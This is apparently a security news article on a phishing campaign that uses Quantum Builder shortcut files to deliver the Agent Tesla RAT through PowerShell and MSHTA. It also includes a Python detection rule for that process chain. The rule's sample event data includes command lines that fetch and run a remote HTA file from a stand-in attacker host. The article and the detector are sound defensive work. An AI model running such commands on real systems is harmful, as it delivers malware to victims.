Hackers Using Dark Web Quantum Builder To Launch Agent Tesla RAT Malware

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Recently, Zscaler ThreatLabz discovered a new malicious campaign in which the Agent Tesla RAT is delivered by a malware builder called Quantum Builder. Agent Tesla is an actively maintained .NET-based keylogger and RAT that has been in operation since 2014.

Compared with previous versions of this campaign, this one is considerably more sophisticated and marks a shift towards LNK (Windows shortcut) files.

Quantum Builder

The malicious shortcut file is created using Quantum Builder, a builder also known as “Quantum Link Builder.”

Due to shared TTPs and source-code overlaps, this campaign has been linked to the Lazarus Group APT. However, security analysts were unable to attribute it to any specific threat actor with confidence.

Quantum Builder is a customizable tool that creates malicious shortcut files and also generates malicious payloads of the following types:

  • HTA
  • ISO
  • PowerShell

These payloads are used to deliver the next-stage malware (Agent Tesla) to the targeted machines.

Infection Chain

The infection chain is a multi-stage attack that begins with phishing emails carrying a GZIP archive as an attachment.

The archive contains a shortcut that executes PowerShell code, which in turn uses MSHTA to launch a remote HTA file.

According to the report, the phishing emails purport to come from a Chinese supplier of lump and rock sugar (Guangdong Nanz Technology co. ltd) and are styled as an order confirmation. The message carries a malicious LNK file that masquerades as a legitimate PDF document.

The HTA file, in turn, decrypts and executes a PowerShell loader script. This script acts as both downloader and executor, running the Agent Tesla malware with administrative privileges.

In a second variant of the infection sequence, a ZIP file replaces the GZIP archive.
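The chain described above (shortcut masquerading as a PDF, PowerShell spawning MSHTA with a remote HTA) leaves a recognisable trace in process-creation telemetry. The following detection logic is an added example written for this article, not code from Zscaler or from the campaign; the Sysmon-style event records, process names and the attacker.example URL are all constructed, and the masquerade check is generalised slightly beyond the PDF case the report mentions to other document extensions.

```python
import json
import re

# Constructed Sysmon-style process-creation events (hypothetical sample data,
# one JSON object per line). The middle two lines mimic the LNK -> PowerShell
# -> MSHTA chain from the report; the last line is benign noise.
SAMPLE_EVENTS = r'''
{"pid": 4210, "ppid": 1820, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"pid": 5011, "ppid": 4210, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -w hidden -c \"mshta http://attacker.example/order.hta\""}
{"pid": 5022, "ppid": 5011, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta http://attacker.example/order.hta"}
{"pid": 6100, "ppid": 1820, "image": "C:\\Program Files\\Editor\\editor.exe", "cmdline": "editor.exe readme.hta"}
'''

# A remote HTA reference: an http(s) URL whose path ends in .hta
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)

# Extensions an attacker is likely to imitate with a shortcut file
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def parse_events(text):
    """Parse newline-delimited JSON event records into dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_mshta_chain(events):
    """Flag mshta.exe launching a remote HTA while parented by powershell.exe."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "mshta.exe":
            continue
        match = REMOTE_HTA.search(e["cmdline"])
        if not match:
            continue  # local HTA usage is noisier; keep the rule tight
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) == "powershell.exe":
            alerts.append({"pid": e["pid"], "parent_pid": parent["pid"], "url": match.group(0)})
    return alerts


def is_masquerading_lnk(filename):
    """True for names like Order_Confirmation.pdf.lnk (document-looking .lnk)."""
    name = filename.lower()
    return name.endswith(".lnk") and name[:-4].endswith(DOCUMENT_EXTS)
```

Run over real Sysmon Event ID 1 exports, the same rule catches the ZIP-archive variant as well, since the on-host process chain is unchanged.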

Use of Quantum Builder has increased rapidly in recent months, as threat actors are distributing a variety of malware with it.

Quantum Builder has been used to create malware payloads for cyber-attacks against various organizations, and the latest of these is this Agent Tesla campaign.